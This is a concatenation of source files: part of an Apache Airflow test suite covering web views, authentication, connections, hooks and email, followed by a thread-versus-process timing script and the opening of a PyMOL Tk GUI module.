start_date=timezone.utcnow(),
state=State.RUNNING
)
self.example_xcom.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
def test_index(self):
response = self.app.get('/', follow_redirects=True)
resp_html = response.data.decode('utf-8')
self.assertIn("DAGs", resp_html)
self.assertIn("example_bash_operator", resp_html)
# The HTML should contain data for the last-run. A link to the specific run, and the text of
# the date.
url = "/admin/airflow/graph?" + urlencode({
"dag_id": self.dag_bash2.dag_id,
"execution_date": self.dagrun_bash2.execution_date,
}).replace("&", "&")
self.assertIn(url, resp_html)
self.assertIn(self.dagrun_bash2.execution_date.strftime("%Y-%m-%d %H:%M"), resp_html)
def test_query(self):
response = self.app.get('/admin/queryview/')
self.assertIn("Ad Hoc Query", response.data.decode('utf-8'))
response = self.app.post(
"/admin/queryview/", data=dict(
conn_id="airflow_db",
sql="SELECT+COUNT%281%29+as+TEST+FROM+task_instance"))
self.assertIn("TEST", response.data.decode('utf-8'))
def test_health(self):
response = self.app.get('/health')
self.assertIn('The server is healthy!', response.data.decode('utf-8'))
def test_noaccess(self):
response = self.app.get('/admin/airflow/noaccess')
self.assertIn("You don't seem to have access.", response.data.decode('utf-8'))
def test_pickle_info(self):
response = self.app.get('/admin/airflow/pickle_info')
self.assertIn('{', response.data.decode('utf-8'))
def test_dag_views(self):
response = self.app.get(
'/admin/airflow/graph?dag_id=example_bash_operator')
self.assertIn("runme_0", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/tree?num_runs=25&dag_id=example_bash_operator')
self.assertIn("runme_0", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/duration?days=30&dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/tries?days=30&dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/landing_times?'
'days=30&dag_id=test_example_bash_operator')
self.assertIn("test_example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/landing_times?'
'days=30&dag_id=example_xcom')
self.assertIn("example_xcom", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/gantt?dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/code?dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/blocked')
response = self.app.get(
'/admin/configurationview/')
self.assertIn("Airflow Configuration", response.data.decode('utf-8'))
self.assertIn("Running Configuration", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/rendered?'
'task_id=runme_1&dag_id=example_bash_operator&'
'execution_date={}'.format(DEFAULT_DATE_ISO))
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/log?task_id=run_this_last&'
'dag_id=example_bash_operator&execution_date={}'
''.format(DEFAULT_DATE_ISO))
self.assertIn("run_this_last", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/task?'
'task_id=runme_0&dag_id=example_bash_operator&'
'execution_date={}'.format(DEFAULT_DATE_DS))
self.assertIn("Attributes", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/dag_stats')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/task_stats')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
url = (
"/admin/airflow/success?task_id=run_this_last&"
"dag_id=test_example_bash_operator&upstream=false&downstream=false&"
"future=false&past=false&execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
response = self.app.get(url + "&confirmed=true")
response = self.app.get(
'/admin/airflow/clear?task_id=run_this_last&'
'dag_id=test_example_bash_operator&future=true&past=false&'
'upstream=true&downstream=false&'
'execution_date={}&'
'origin=/admin'.format(DEFAULT_DATE_DS))
self.assertIn("Wait a minute", response.data.decode('utf-8'))
url = (
"/admin/airflow/success?task_id=section-1&"
"dag_id=example_subdag_operator&upstream=true&downstream=true&"
"future=false&past=false&execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
self.assertIn("section-1-task-1", response.data.decode('utf-8'))
self.assertIn("section-1-task-2", response.data.decode('utf-8'))
self.assertIn("section-1-task-3", response.data.decode('utf-8'))
self.assertIn("section-1-task-4", response.data.decode('utf-8'))
self.assertIn("section-1-task-5", response.data.decode('utf-8'))
response = self.app.get(url + "&confirmed=true")
url = (
"/admin/airflow/clear?task_id=runme_1&"
"dag_id=test_example_bash_operator&future=false&past=false&"
"upstream=false&downstream=true&"
"execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
response = self.app.get(url + "&confirmed=true")
url = (
"/admin/airflow/run?task_id=runme_0&"
"dag_id=example_bash_operator&ignore_all_deps=false&ignore_ti_state=true&"
"ignore_task_deps=true&execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
response = self.app.get(
"/admin/airflow/refresh?dag_id=example_bash_operator")
response = self.app.get("/admin/airflow/refresh_all")
response = self.app.post(
"/admin/airflow/paused?"
"dag_id=example_python_operator&is_paused=false")
self.assertIn("OK", response.data.decode('utf-8'))
response = self.app.get("/admin/xcom", follow_redirects=True)
self.assertIn("Xcoms", response.data.decode('utf-8'))
def test_charts(self):
session = Session()
chart_label = "Airflow task instance by type"
chart = session.query(
models.Chart).filter(models.Chart.label == chart_label).first()
chart_id = chart.id
session.close()
response = self.app.get(
'/admin/airflow/chart'
'?chart_id={}&iteration_no=1'.format(chart_id))
self.assertIn("Airflow task instance by type", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/chart_data'
'?chart_id={}&iteration_no=1'.format(chart_id))
self.assertIn("example", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/dag_details?dag_id=example_branch_operator')
self.assertIn("run_this_first", response.data.decode('utf-8'))
def test_fetch_task_instance(self):
url = (
"/admin/airflow/object/task_instances?"
"dag_id=test_example_bash_operator&"
"execution_date={}".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("run_this_last", response.data.decode('utf-8'))
def tearDown(self):
configuration.conf.set("webserver", "expose_config", "False")
self.dag_bash.clear(start_date=DEFAULT_DATE, end_date=timezone.utcnow())
session = Session()
session.query(models.DagRun).delete()
session.query(models.TaskInstance).delete()
session.commit()
session.close()
class SecureModeWebUiTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("core", "secure_mode", "True")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
def test_query(self):
response = self.app.get('/admin/queryview/')
self.assertEqual(response.status_code, 404)
def test_charts(self):
response = self.app.get('/admin/chart/')
self.assertEqual(response.status_code, 404)
def tearDown(self):
configuration.conf.remove_option("core", "SECURE_MODE")
class WebPasswordAuthTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.password_auth")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
from airflow.contrib.auth.backends.password_auth import PasswordUser
session = Session()
user = models.User()
password_user = PasswordUser(user)
password_user.username = 'airflow_passwordauth'
password_user.password = 'password'
print(password_user._password)
session.add(password_user)
session.commit()
session.close()
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def login(self, username, password):
response = self.app.get('/admin/airflow/login')
csrf_token = self.get_csrf(response)
return self.app.post('/admin/airflow/login', data=dict(
username=username,
password=password,
csrf_token=csrf_token
), follow_redirects=True)
def logout(self):
return self.app.get('/admin/airflow/logout', follow_redirects=True)
def test_login_logout_password_auth(self):
self.assertTrue(configuration.conf.getboolean('webserver', 'authenticate'))
response = self.login('user1', 'whatever')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('airflow_passwordauth', 'wrongpassword')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('airflow_passwordauth', 'password')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.logout()
self.assertIn('form-signin', response.data.decode('utf-8'))
def test_unauthorized_password_auth(self):
response = self.app.get("/admin/airflow/landing_times")
self.assertEqual(response.status_code, 302)
def tearDown(self):
configuration.load_test_config()
session = Session()
session.query(models.User).delete()
session.commit()
session.close()
configuration.conf.set("webserver", "authenticate", "False")
class WebLdapAuthTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.ldap_auth")
try:
configuration.conf.add_section("ldap")
except:
pass
configuration.conf.set("ldap", "uri", "ldap://localhost:3890")
configuration.conf.set("ldap", "user_filter", "objectClass=*")
configuration.conf.set("ldap", "user_name_attr", "uid")
configuration.conf.set("ldap", "bind_user", "cn=Manager,dc=example,dc=com")
configuration.conf.set("ldap", "bind_password", "insecure")
configuration.conf.set("ldap", "basedn", "dc=example,dc=com")
configuration.conf.set("ldap", "cacert", "")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def login(self, username, password):
response = self.app.get('/admin/airflow/login')
csrf_token = self.get_csrf(response)
return self.app.post('/admin/airflow/login', data=dict(
username=username,
password=password,
csrf_token=csrf_token
), follow_redirects=True)
def logout(self):
return self.app.get('/admin/airflow/logout', follow_redirects=True)
def test_login_logout_ldap(self):
self.assertTrue(configuration.conf.getboolean('webserver', 'authenticate'))
response = self.login('user1', 'userx')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('userz', 'user1')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('user1', 'user1')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.logout()
self.assertIn('form-signin', response.data.decode('utf-8'))
def test_unauthorized(self):
response = self.app.get("/admin/airflow/landing_times")
self.assertEqual(response.status_code, 302)
def test_no_filter(self):
response = self.login('user1', 'user1')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
self.assertIn('Connections', response.data.decode('utf-8'))
def test_with_filters(self):
configuration.conf.set('ldap', 'superuser_filter',
'description=superuser')
configuration.conf.set('ldap', 'data_profiler_filter',
'description=dataprofiler')
response = self.login('dataprofiler', 'dataprofiler')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.login('superuser', 'superuser')
self.assertIn('Connections', response.data.decode('utf-8'))
def tearDown(self):
configuration.load_test_config()
session = Session()
session.query(models.User).delete()
session.commit()
session.close()
configuration.conf.set("webserver", "authenticate", "False")
class LdapGroupTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.ldap_auth")
try:
configuration.conf.add_section("ldap")
except:
pass
configuration.conf.set("ldap", "uri", "ldap://localhost:3890")
configuration.conf.set("ldap", "user_filter", "objectClass=*")
configuration.conf.set("ldap", "user_name_attr", "uid")
configuration.conf.set("ldap", "bind_user", "cn=Manager,dc=example,dc=com")
configuration.conf.set("ldap", "bind_password", "insecure")
configuration.conf.set("ldap", "basedn", "dc=example,dc=com")
configuration.conf.set("ldap", "cacert", "")
def test_group_belonging(self):
from airflow.contrib.auth.backends.ldap_auth import LdapUser
users = {"user1": ["group1", "group3"],
"user2": ["group2"]
}
for user in users:
mu = models.User(username=user,
is_superuser=False)
auth = LdapUser(mu)
self.assertEqual(set(users[user]), set(auth.ldap_groups))
def tearDown(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
class FakeWebHDFSHook(object):
def __init__(self, conn_id):
self.conn_id = conn_id
def get_conn(self):
return self.conn_id
def check_for_path(self, hdfs_path):
return hdfs_path
class FakeSnakeBiteClientException(Exception):
pass
class FakeSnakeBiteClient(object):
def __init__(self):
self.started = True
def ls(self, path, include_toplevel=False):
"""
the fake snakebite client
:param path: the array of path to test
:param include_toplevel: to return the toplevel directory info
:return: a list for path for the matching queries
"""
if path[0] == '/datadirectory/empty_directory' and not include_toplevel:
return []
elif path[0] == '/datadirectory/datafile':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/datafile'
}]
elif path[0] == '/datadirectory/empty_directory' and include_toplevel:
return [{
'group': u'supergroup',
'permission': 493,
'file_type': 'd',
'access_time': 0,
'block_replication': 0,
'modification_time': 1481132141540,
'length': 0,
'blocksize': 0,
'owner': u'hdfs',
'path': '/datadirectory/empty_directory'
}]
elif path[0] == '/datadirectory/not_empty_directory' and include_toplevel:
return [{
'group': u'supergroup',
'permission': 493,
'file_type': 'd',
'access_time': 0,
'block_replication': 0,
'modification_time': 1481132141540,
'length': 0,
'blocksize': 0,
'owner': u'hdfs',
'path': '/datadirectory/empty_directory'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/not_empty_directory/test_file'
}]
elif path[0] == '/datadirectory/not_empty_directory':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/not_empty_directory/test_file'
}]
elif path[0] == '/datadirectory/not_existing_file_or_directory':
raise FakeSnakeBiteClientException
elif path[0] == '/datadirectory/regex_dir':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862, 'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test1file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test2file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test3file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/copying_file_1.txt._COPYING_'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/copying_file_3.txt.sftp'
}]
else:
raise FakeSnakeBiteClientException
class FakeHDFSHook(object):
def __init__(self, conn_id=None):
self.conn_id = conn_id
def get_conn(self):
client = FakeSnakeBiteClient()
return client
class ConnectionTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
utils.db.initdb()
os.environ['AIRFLOW_CONN_TEST_URI'] = (
'postgres://username:[email protected]:5432/the_database')
os.environ['AIRFLOW_CONN_TEST_URI_NO_CREDS'] = (
'postgres://ec2.compute.com/the_database')
def tearDown(self):
env_vars = ['AIRFLOW_CONN_TEST_URI', 'AIRFLOW_CONN_AIRFLOW_DB']
for ev in env_vars:
if ev in os.environ:
del os.environ[ev]
def test_using_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
def test_using_unix_socket_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri_no_creds')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertIsNone(c.login)
self.assertIsNone(c.password)
self.assertIsNone(c.port)
def test_param_setup(self):
c = models.Connection(conn_id='local_mysql', conn_type='mysql',
host='localhost', login='airflow',
password='airflow', schema='airflow')
self.assertEqual('localhost', c.host)
self.assertEqual('airflow', c.schema)
self.assertEqual('airflow', c.login)
self.assertEqual('airflow', c.password)
self.assertIsNone(c.port)
def test_env_var_priority(self):
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertNotEqual('ec2.compute.com', c.host)
os.environ['AIRFLOW_CONN_AIRFLOW_DB'] = \
'postgres://username:[email protected]:5432/the_database'
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
del os.environ['AIRFLOW_CONN_AIRFLOW_DB']
def test_dbapi_get_uri(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
self.assertEqual('postgres://username:[email protected]:5432/the_database', hook.get_uri())
conn2 = BaseHook.get_connection(conn_id='test_uri_no_creds')
hook2 = conn2.get_hook()
self.assertEqual('postgres://ec2.compute.com/the_database', hook2.get_uri())
def test_dbapi_get_sqlalchemy_engine(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
engine = hook.get_sqlalchemy_engine()
self.assertIsInstance(engine, sqlalchemy.engine.Engine)
self.assertEqual('postgres://username:[email protected]:5432/the_database', str(engine.url))
def test_get_connections_env_var(self):
conns = SqliteHook.get_connections(conn_id='test_uri')
assert len(conns) == 1
assert conns[0].host == 'ec2.compute.com'
assert conns[0].schema == 'the_database'
assert conns[0].login == 'username'
assert conns[0].password == 'password'
assert conns[0].port == 5432
def test_get_connections_db(self):
conns = BaseHook.get_connections(conn_id='airflow_db')
assert len(conns) == 1
assert conns[0].host == 'localhost'
assert conns[0].schema == 'airflow'
assert conns[0].login == 'root'
class WebHDFSHookTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
def test_simple_init(self):
from airflow.hooks.webhdfs_hook import WebHDFSHook
c = WebHDFSHook()
self.assertIsNone(c.proxy_user)
def test_init_proxy_user(self):
from airflow.hooks.webhdfs_hook import WebHDFSHook
c = WebHDFSHook(proxy_user='someone')
self.assertEqual('someone', c.proxy_user)
try:
from airflow.hooks.hdfs_hook import HDFSHook
import snakebite
except ImportError:
HDFSHook = None
@unittest.skipIf(HDFSHook is None,
"Skipping test because HDFSHook is not installed")
class HDFSHookTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
os.environ['AIRFLOW_CONN_HDFS_DEFAULT'] = ('hdfs://localhost:8020')
def test_get_client(self):
client = HDFSHook(proxy_user='foo').get_conn()
self.assertIsInstance(client, snakebite.client.Client)
self.assertEqual('localhost', client.host)
self.assertEqual(8020, client.port)
self.assertEqual('foo', client.service.channel.effective_user)
@mock.patch('airflow.hooks.hdfs_hook.AutoConfigClient')
@mock.patch('airflow.hooks.hdfs_hook.HDFSHook.get_connections')
def test_get_autoconfig_client(self, mock_get_connections,
MockAutoConfigClient):
c = models.Connection(conn_id='hdfs', conn_type='hdfs',
host='localhost', port=8020, login='foo',
extra=json.dumps({'autoconfig': True}))
mock_get_connections.return_value = [c]
HDFSHook(hdfs_conn_id='hdfs').get_conn()
MockAutoConfigClient.assert_called_once_with(effective_user='foo',
use_sasl=False)
@mock.patch('airflow.hooks.hdfs_hook.AutoConfigClient')
def test_get_autoconfig_client_no_conn(self, MockAutoConfigClient):
HDFSHook(hdfs_conn_id='hdfs_missing', autoconfig=True).get_conn()
MockAutoConfigClient.assert_called_once_with(effective_user=None,
use_sasl=False)
@mock.patch('airflow.hooks.hdfs_hook.HDFSHook.get_connections')
def test_get_ha_client(self, mock_get_connections):
c1 = models.Connection(conn_id='hdfs_default', conn_type='hdfs',
host='localhost', port=8020)
c2 = models.Connection(conn_id='hdfs_default', conn_type='hdfs',
host='localhost2', port=8020)
mock_get_connections.return_value = [c1, c2]
client = HDFSHook().get_conn()
self.assertIsInstance(client, snakebite.client.HAClient)
try:
from airflow.hooks.http_hook import HttpHook
except ImportError:
HttpHook = None
@unittest.skipIf(HttpHook is None,
"Skipping test because HttpHook is not installed")
class HttpHookTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
@mock.patch('airflow.hooks.http_hook.HttpHook.get_connection')
def test_http_connection(self, mock_get_connection):
c = models.Connection(conn_id='http_default', conn_type='http',
host='localhost', schema='http')
mock_get_connection.return_value = c
hook = HttpHook()
hook.get_conn({})
self.assertEqual(hook.base_url, 'http://localhost')
@mock.patch('airflow.hooks.http_hook.HttpHook.get_connection')
def test_https_connection(self, mock_get_connection):
c = models.Connection(conn_id='http_default', conn_type='http',
host='localhost', schema='https')
mock_get_connection.return_value = c
hook = HttpHook()
hook.get_conn({})
self.assertEqual(hook.base_url, 'https://localhost')
@mock.patch('airflow.hooks.http_hook.HttpHook.get_connection')
def test_host_encoded_http_connection(self, mock_get_connection):
c = models.Connection(conn_id='http_default', conn_type='http',
host='http://localhost')
mock_get_connection.return_value = c
hook = HttpHook()
hook.get_conn({})
self.assertEqual(hook.base_url, 'http://localhost')
@mock.patch('airflow.hooks.http_hook.HttpHook.get_connection')
def test_host_encoded_https_connection(self, mock_get_connection):
c = models.Connection(conn_id='http_default', conn_type='http',
host='https://localhost')
mock_get_connection.return_value = c
hook = HttpHook()
hook.get_conn({})
self.assertEqual(hook.base_url, 'https://localhost')
send_email_test = mock.Mock()
class EmailTest(unittest.TestCase):
def setUp(self):
configuration.conf.remove_option('email', 'EMAIL_BACKEND')
@mock.patch('airflow.utils.email.send_email')
def test_default_backend(self, mock_send_email):
res = utils.email.send_email('to', 'subject', 'content')
mock_send_email.assert_called_with('to', 'subject', 'content')
self.assertEqual(mock_send_email.return_value, res)
@mock.patch('airflow.utils.email.send_email_smtp')
def test_custom_backend(self, mock_send_email):
configuration.conf.set('email', 'EMAIL_BACKEND', 'tests.core.send_email_test')
utils.email.send_email('to', 'subject', 'content')
send_email_test.assert_called_with(
'to', 'subject', 'content', files=None, dryrun=False,
cc=None, bcc=None, mime_subtype='mixed'
)
self.assertFalse(mock_send_email.called)
class EmailSmtpTest(unittest.TestCase):
def setUp(self):
configuration.conf.set('smtp', 'SMTP_SSL', 'False')
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_smtp(self, mock_send_mime):
attachment = tempfile.NamedTemporaryFile()
attachment.write(b'attachment')
attachment.seek(0)
utils.email.send_email_smtp('to', 'subject', 'content', files=[attachment.name])
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), call_args[0])
self.assertEqual(['to'], call_args[1])
msg = call_args[2]
self.assertEqual('subject', msg['Subject'])
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), msg['From'])
self.assertEqual(2, len(msg.get_payload()))
self.assertEqual(u'attachment; filename="' + os.path.basename(attachment.name) + '"',
msg.get_payload()[-1].get(u'Content-Disposition'))
mimeapp = MIMEApplication('attachment')
self.assertEqual(mimeapp.get_payload(), msg.get_payload()[-1].get_payload())
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_bcc_smtp(self, mock_send_mime):
attachment = tempfile.NamedTemporaryFile()
attachment.write(b'attachment')
attachment.seek(0)
utils.email.send_email_smtp('to', 'subject', 'content', files=[attachment.name], cc='cc', bcc='bcc')
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), call_args[0])
self.assertEqual(['to', 'cc', 'bcc'], call_args[1])
msg = call_args[2]
self.assertEqual('subject', msg['Subject'])
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), msg['From'])
self.assertEqual(2, len(msg.get_payload()))
self.assertEqual(u'attachment; filename="' + os.path.basename(attachment.name) + '"',
msg.get_payload()[-1].get(u'Content-Disposition'))
mimeapp = MIMEApplication('attachment')
self.assertEqual(mimeapp.get_payload(), msg.get_payload()[-1].get_payload())
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime(self, mock_smtp, mock_smtp_ssl):
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
msg = MIMEMultipart()
utils.email.send_MIME_email('from', 'to', msg, dryrun=False)
mock_smtp.assert_called_with(
configuration.conf.get('smtp', 'SMTP_HOST'),
configuration.conf.getint('smtp', 'SMTP_PORT'),
)
self.assertTrue(mock_smtp.return_value.starttls.called)
mock_smtp.return_value.login.assert_called_with(
configuration.conf.get('smtp', 'SMTP_USER'),
configuration.conf.get('smtp', 'SMTP_PASSWORD'),
)
mock_smtp.return_value.sendmail.assert_called_with('from', 'to', msg.as_string())
self.assertTrue(mock_smtp.return_value.quit.called)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_ssl(self, mock_smtp, mock_smtp_ssl):
configuration.conf.set('smtp', 'SMTP_SSL', 'True')
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=False)
self.assertFalse(mock_smtp.called)
mock_smtp_ssl.assert_called_with(
configuration.conf.get('smtp', 'SMTP_HOST'),
configuration.conf.getint('smtp', 'SMTP_PORT'),
)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_noauth(self, mock_smtp, mock_smtp_ssl):
configuration.conf.remove_option('smtp', 'SMTP_USER')
configuration.conf.remove_option('smtp', 'SMTP_PASSWORD')
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=False)
self.assertFalse(mock_smtp_ssl.called)
mock_smtp.assert_called_with(
configuration.conf.get('smtp', 'SMTP_HOST'),
configuration.conf.getint('smtp', 'SMTP_PORT'),
)
self.assertFalse(mock_smtp.login.called)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_dryrun(self, mock_smtp, mock_smtp_ssl):
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=True)
self.assertFalse(mock_smtp.called)
self.assertFalse(mock_smtp_ssl.called)
if __name__ == '__main__':
unittest.main()
|
forkVsCreate.py
|
import threading
from multiprocessing import Process
import time
import os
def MyThread():
time.sleep(2)
t0 = time.time()
threads = []
for i in range(10):
thread = threading.Thread(target=MyThread)
thread.start()
threads.append(thread)
t1 = time.time()
print("Total Time for Creating 10 Threads: {} seconds".format(t1-t0))
for thread in threads:
thread.join()
t2 = time.time()
procs = []
for i in range(10):
process = Process(target=MyThread)
process.start()
procs.append(process)
t3 = time.time()
print("Total Time for Creating 10 Processes: {} seconds".format(t3-t2))
for proc in procs:
proc.join()
|
__init__.py
|
from __future__ import print_function
import sys
import re
import threading
import os
import time
if sys.version_info[0] == 2:
from Tkinter import *
import tkFileDialog
import tkMessageBox
import tkFont
_next_method_name = 'next'
else:
from tkinter import *
import tkinter.filedialog as tkFileDialog
import tkinter.messagebox as tkMessageBox
import tkinter.font as tkFont
_next_method_name = '__next__'
import Pmw
from pymol.wizard import cleanup
from pmg_tk.Setting import Setting
from pmg_tk.SetEditor import SetEditor
from pmg_tk.ColorEditor import ColorEditor
from pmg_tk.skins import PMGSkin
from .builder import Builder
import traceback
root = None
def encode(s):
'''If `s` is unicode, attempt to encode it. On faiure, return the
unicode input.
Our C file I/O implementations can't handle unicode. For some file
types we support reading the file in Python (supports unicode) and
passing the content to the underlying C routine.
'''
if sys.version_info[0] >= 3:
return s
if not isinstance(s, bytes):
for enc in [sys.getfilesystemencoding(), 'latin1']:
try:
e = s.encode(enc)
if os.path.exists(e):
return e
except UnicodeEncodeError:
pass
return s
def split_tk_file_list(pattern):
filenames = []
while True:
pattern = pattern.strip()
if not pattern:
break
sep = None
if pattern[0] == '{':
pattern = pattern[1:]
sep = '}'
a = pattern.split(sep, 1)
filenames.append(a[0])
pattern = a[1] if len(a) == 2 else ''
return filenames
def asksaveasfilename(*args, **kwargs):
filename = tkFileDialog.asksaveasfilename(*args, **kwargs)
return encode(filename)
def askopenfilename(*args, **kwargs):
filename = tkFileDialog.askopenfilename(*args, **kwargs)
if not filename:
return filename
multiple = kwargs.get('multiple', 0)
if not multiple:
filename = [filename]
elif not isinstance(filename, (list, tuple)):
filename = split_tk_file_list(filename)
filename = map(os.path.normpath, filename)
filename = map(encode, filename)
filename = list(filename)
if not multiple:
return filename[0]
return filename
def _darwin_browser_open(url):
os.popen("open "+url,'r').read()
def darwin_browser_open(url):
t = threading.Thread(target=_darwin_browser_open,args=(url,))
t.setDaemon(1)
t.start()
def _doAsync(self_cmd,cmmd,dirty=0):
self_cmd.do(cmmd) # force strict ordering of commands
if dirty:
self_cmd.dirty()
def _def_ext(ext): # platform-specific default extension handling
if sys.platform != 'win32':
ext = None # default extensions don't work right under X11/Tcl/Tk
return ext
## class askfileopenfilter(askopenfilename):
## """
## Subclasses open file dialog to include filename filtering
## """
## def __init__(self, initialdir = initdir, filetypes=ftypes, multiple=1):
## super(askfileopen, self).__init__( initialdir, filetypes, multiple=multiple)
class Normal(PMGSkin):
